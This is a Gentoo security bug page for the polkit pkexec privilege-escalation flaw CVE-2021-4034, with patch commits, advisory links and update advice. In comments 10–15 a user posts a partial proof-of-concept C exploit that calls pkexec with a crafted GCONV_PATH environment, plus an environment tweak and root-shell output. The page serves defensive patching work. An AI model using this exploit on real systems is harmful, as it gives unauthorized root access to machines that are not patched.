Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 832057 (CVE-2021-4034) - <sys-auth/polkit-0.120-r2: Local privilege escalation (CVE-2021-4034)
Summary: <sys-auth/polkit-0.120-r2: Local privilege escalation (CVE-2021-4034)
Status: RESOLVED FIXED
Alias: CVE-2021-4034
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal critical (vote)
Assignee: Gentoo Security
URL: https://www.qualys.com/2022/01/25/cve...
Whiteboard: A1 [glsa]
Keywords: PullRequest
Depends on: 832060 832075
Blocks:
  Show dependency tree
 
Reported: 2022-01-25 17:06 UTC by Sam James
Modified: 2022-05-08 06:34 UTC (History)
4 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-01-25 17:06:56 UTC
More information when disclosed.
Comment 1 Larry the Git Cow gentoo-dev 2022-01-25 17:26:02 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=d0e16d6fb24423388c5acd74e5f0b9856af08f08

commit d0e16d6fb24423388c5acd74e5f0b9856af08f08
Author:     Sam James <sam@gentoo.org>
AuthorDate: 2022-01-25 17:25:25 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-01-25 17:25:54 +0000

    sys-auth/polkit: fix CVE-2021-4043
    
    Bug: https://bugs.gentoo.org/832057
    Signed-off-by: Sam James <sam@gentoo.org>

 .../polkit/files/polkit-0.120-CVE-2021-4043.patch  |  72 +++++++++++++
 sys-auth/polkit/polkit-0.120-r2.ebuild             | 120 +++++++++++++++++++++
 2 files changed, 192 insertions(+)
Comment 2 Larry the Git Cow gentoo-dev 2022-01-26 00:51:23 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=77e50819c7c7c22dee5ee6b2e7538b3cfff789af

commit 77e50819c7c7c22dee5ee6b2e7538b3cfff789af
Author:     Sam James <sam@gentoo.org>
AuthorDate: 2022-01-26 00:50:34 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-01-26 00:51:00 +0000

    sys-auth/polkit: backport CVE-2021-3560, CVE-2021-4043 patches to 0.117
    
    Needed for non-Rust arches like sparc.
    
    (Most users are on 0.120 and already fixed in previous commits.)
    
    Bug: https://bugs.gentoo.org/794052
    Bug: https://bugs.gentoo.org/832057
    Signed-off-by: Sam James <sam@gentoo.org>

 .../polkit/files/polkit-0.117-CVE-2021-3560.patch  |  29 +++++
 sys-auth/polkit/polkit-0.117-r3.ebuild             | 136 +++++++++++++++++++++
 2 files changed, 165 insertions(+)
Comment 3 Gleb 2022-01-26 10:13:11 UTC
polkit-0.120-r2 is already stable, so how users should apply the fix? Portage doesn't offer anything to rebuild.

Should this be addressed by using glsa-check?
Comment 4 Gleb 2022-01-26 10:23:02 UTC
I missed the fact that 0.120-r2 went stable today with the fix and it was installed on my system. Sorry for the noise.
Comment 5 Thomas Capricelli 2022-01-26 17:35:58 UTC
I dont understand. How do I know if the polkit on my systems has the fix or not ?

Which package versions are ok ?
Comment 6 Nils Freydank 2022-01-26 18:40:17 UTC
(In reply to Thomas Capricelli from comment #5)
> I dont understand. How do I know if the polkit on my systems has the fix or
> not ?
> 
> Which package versions are ok ?

Hi Thomas, please refer to the title which says "<sys-auth/polkit-0.120-r2". This means that any version number of polkit with a version below 0.120-r2 is vunerable and affected by the bug, not including 0.120-r2 itself (that would be <= instead). You can update polkit e.g by running 'emerge --sync && emerge --ask --oneshot --verbose sys-auth/polkit'. For further questions please consult the wiki, the forum and/or any of the IRC channels.
Comment 7 Thomas Capricelli 2022-01-27 00:39:24 UTC
(In reply to Nils Freydank from comment #6)
> For further questions
> please consult the wiki, the forum and/or any of the IRC channels.

Hi Nils. No further question, your answer was perfect. Thanks for clarifying.
Comment 8 Larry the Git Cow gentoo-dev 2022-01-27 05:34:31 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/data/glsa.git/commit/?id=3b7263dbbe36631a95b29efe1f17ce9dfb40cc90

commit 3b7263dbbe36631a95b29efe1f17ce9dfb40cc90
Author:     Sam James <sam@gentoo.org>
AuthorDate: 2022-01-27 05:33:39 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-01-27 05:34:25 +0000

    [ GLSA 202201-01 ] Polkit: Local privilege escalation
    
    Bug: https://bugs.gentoo.org/832057
    Signed-off-by: Sam James <sam@gentoo.org>

 glsa-202201-01.xml | 43 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)
Comment 9 Larry the Git Cow gentoo-dev 2022-01-27 19:50:36 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=943593956c04c5c2b1f1c679d5b3f36428d1173a

commit 943593956c04c5c2b1f1c679d5b3f36428d1173a
Author:     Mathieu Tortuyaux <mtortuyaux@microsoft.com>
AuthorDate: 2022-01-27 09:31:48 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-01-27 19:50:27 +0000

    sys-auth/polkit: fix CVE id
    
    Nit-pick to avoid confusion.
    
    Bug: https://bugs.gentoo.org/832057
    Package-Manager: Portage-3.0.28, Repoman-3.0.3
    Signed-off-by: Mathieu Tortuyaux <mtortuyaux@microsoft.com>
    Closes: https://github.com/gentoo/gentoo/pull/23980
    Signed-off-by: Sam James <sam@gentoo.org>

 ...olkit-0.120-CVE-2021-4043.patch => polkit-0.120-CVE-2021-4034.patch} | 0
 sys-auth/polkit/polkit-0.117-r3.ebuild                                  | 2 +-
 sys-auth/polkit/polkit-0.120-r2.ebuild                                  | 2 +-
 3 files changed, 2 insertions(+), 2 deletions(-)
Comment 10 foufou33 2022-01-28 03:46:49 UTC
stupid question, has anyone checked that the exploit actually works?

Asking b/c the same  PoC code works on non patched debian/redhat (derivatives) but fails miserably with gentoo (and may be arch), with sys-auth/polkit-0.120-r1.

Traced tot the getenv  call that's supposed to get GCONV_PATH. if fails here (getenv.c):

85       if (name_start == ep_start && !strncmp (*ep + 2, name, len)
86           && (*ep)[len + 2] == '=')

*ep points to the original value (called it gconv in my code) not the rewritten one (GCONV_PATH), which is strange as et is initialised from __environ, and __envron[0] point to GCONV_PATH=./gconv  
I'm really stomped.
Comment 11 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-01-28 04:07:38 UTC
(In reply to foufou33 from comment #10)
> stupid question, has anyone checked that the exploit actually works?
> 

I think there's various PoCs floating around but not Qualys'.

> Asking b/c the same  PoC code works on non patched debian/redhat
> (derivatives) but fails miserably with gentoo (and may be arch), with
> sys-auth/polkit-0.120-r1.
> 
> Traced tot the getenv  call that's supposed to get GCONV_PATH. if fails here
> (getenv.c):
> 
> 85       if (name_start == ep_start && !strncmp (*ep + 2, name, len)
> 86           && (*ep)[len + 2] == '=')
> 
> *ep points to the original value (called it gconv in my code) not the
> rewritten one (GCONV_PATH), which is strange as et is initialised from
> __environ, and __envron[0] point to GCONV_PATH=./gconv  
> I'm really stomped.

I assume you're on a glibc system? I've not really poked at it (ajak@ has though and it worked for him on a Gentoo system, I believe) but it's an interesting question: I wonder if some settings can influence at least one of the exploits (not the vulnerability itself which ofc definitely exists.)
Comment 12 John Helmert III gentoo-dev Security 2022-01-28 04:44:11 UTC
I've not gotten one working, but I haven't poked with it outside of my own environment. For fun, I started working on an exploit after the vulnerability was public, but I came to the conclusion that for some reason my environment under Sway isn't affected. Just calling `pkexec` fails:

~ $ pkexec
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ====
Authentication is needed to run `/bin/bash' as the super user
Authenticating as: System user; root (root)
Password:
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ====
Error executing command as another user: Not authorized

This incident has been reported.

I'm not sure what this is about, but after discovering this I stopped working on it. I suspect it's more likely to be affected on GNOME or KDE.
Comment 13 foufou33 2022-01-28 18:00:40 UTC
(In reply to Sam James from comment #11)
> (In reply to foufou33 from comment #10)
> > stupid question, has anyone checked that the exploit actually works?
> > 
> 
> I think there's various PoCs floating around but not Qualys'.
> 
I wrote my own using their description

int main (int argc, char **argv) {
        char *envp[] = {"gconv","PATH=GCONV_PATH=.","CHARSET=DUMMY","SHELL=bash",0};
        char *const args[] = {0};
        //char exe[] = "./envp";
        char exe[] = "/usr/bin/pkexec";
        execve(exe, args,envp);
        return 0;
}
(mkdir  'GCONV_PATH=.' && touch 'GCONV_PATH=.'/gconv && mkdir gconv ...etc)

gconv dir contains 
> > Asking b/c the same  PoC code works on non patched debian/redhat
> > (derivatives) but fails miserably with gentoo (and may be arch), with
> > sys-auth/polkit-0.120-r1.
> > 
> > Traced tot the getenv  call that's supposed to get GCONV_PATH. if fails here
> > (getenv.c):
> > 
> > 85       if (name_start == ep_start && !strncmp (*ep + 2, name, len)
> > 86           && (*ep)[len + 2] == '=')
> > 
> > *ep points to the original value (called it gconv in my code) not the
> > rewritten one (GCONV_PATH), which is strange as et is initialised from
> > __environ, and __envron[0] point to GCONV_PATH=./gconv  
> > I'm really stomped.
> 
> I assume you're on a glibc system? I've not really poked at it (ajak@ has
> though and it worked for him on a Gentoo system, I believe) but it's an
> interesting question: I wonder if some settings can influence at least one
> of the exploits (not the vulnerability itself which ofc definitely exists.)
Comment 14 foufou33 2022-01-28 18:07:40 UTC
sorry, hit the send button without realsing it :-/


to continue :
gconv dir contains  gconv-modules and the .so it is supposed to load (it's content is irrelvant as it is supposed to do whatever we want)


> I assume you're on a glibc system? I've not really poked at it (ajak@ has
> though and it worked for him on a Gentoo system, I believe) but it's an
> interesting question: I wonder if some settings can influence at least one
> of the exploits (not the vulnerability itself which ofc definitely exists.)
yes glibc 2.34 and ahve an old one still on 2.32 same result:


$ ./pwnkit
GLib: Cannot convert message: Could not open converter from “UTF-8” to “DUMMY”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.


instead of a root shell, the reason as I stated the call to getenv("GCONV_PATH") returns null inspite of __envrion[0] == "GCONV_PATH=./gconv".
Comment 15 foufou33 2022-01-28 18:33:11 UTC
oh well, setting GIO_USE_VFS= seems to fix it

./pwnkit.exe 
pwned
sh-5.1#

stolen from here : 
https://github.com/berdav/CVE-2021-4034/commit/c219bcab54ec532ab4ead63ecb311e9d16a367d0
Comment 16 Larry the Git Cow gentoo-dev 2022-02-05 20:46:41 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c0502be50e13cb62efd5c5fbb3e2cac255490e15

commit c0502be50e13cb62efd5c5fbb3e2cac255490e15
Author:     Andreas Sturmlechner <asturm@gentoo.org>
AuthorDate: 2022-02-05 20:30:47 +0000
Commit:     Andreas Sturmlechner <asturm@gentoo.org>
CommitDate: 2022-02-05 20:40:48 +0000

    sys-auth/polkit: Cleanup vulnerable 0.117-r2, 0.119-r2 and 0.120-r1
    
    Bug: https://bugs.gentoo.org/832057
    Package-Manager: Portage-3.0.30, Repoman-3.0.3
    Signed-off-by: Andreas Sturmlechner <asturm@gentoo.org>

 sys-auth/polkit/Manifest               |   1 -
 sys-auth/polkit/polkit-0.117-r2.ebuild | 133 ---------------------------------
 sys-auth/polkit/polkit-0.119-r2.ebuild | 132 --------------------------------
 sys-auth/polkit/polkit-0.120-r1.ebuild | 119 -----------------------------
 4 files changed, 385 deletions(-)
Comment 17 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-05-05 23:39:15 UTC
GLSA was done in https://security.gentoo.org/glsa/202201-01.